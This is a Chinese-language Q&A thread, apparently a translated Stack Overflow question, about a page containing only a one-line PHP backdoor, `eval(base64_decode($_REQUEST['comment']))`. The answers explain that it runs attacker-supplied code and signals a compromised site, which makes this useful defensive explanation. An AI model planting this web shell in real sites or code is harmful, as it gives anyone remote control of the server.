我需要了解以下代码
eval(base64_decode($_REQUEST['comment']));
它利用了CPU,页面只包含此代码
答案 0 :(得分:4)
这可能字面上运行任何东西,所以无法知道。它接受来自$ _REQUEST ['comment']的输入,base64对其进行解码,然后将其作为PHP代码运行。
例如,如果传递cGhwaW5mbygpOw==,则会执行phpinfo();。
另一方面,那些类型的代码片段通常是一个红旗,通常用作后门。
答案 1 :(得分:1)
此代码base64_decodes一些输入,然后将其评估为PHP代码。最终最终执行的内容取决于注释字段的内容。
答案 2 :(得分:1)
我猜您发现这已插入到您网页上的代码中,这意味着您的网站在某种程度上受到了损害。这意味着字面上任何人可以编写任何 PHP代码来执行任何,base64_encode()它,并将其发布到您的网站中'comment'字段,服务器将执行它。
当您实际注意它正在使用大量资源时,它可能被用于发送垃圾邮件或DOS某人,但只要该代码存在,它可能被用来危害您的服务器
基本上,如果你发现以eval(base64_decode(...开头的东西,它会做坏事。
来源:作为网络托管公司的系统管理员5年。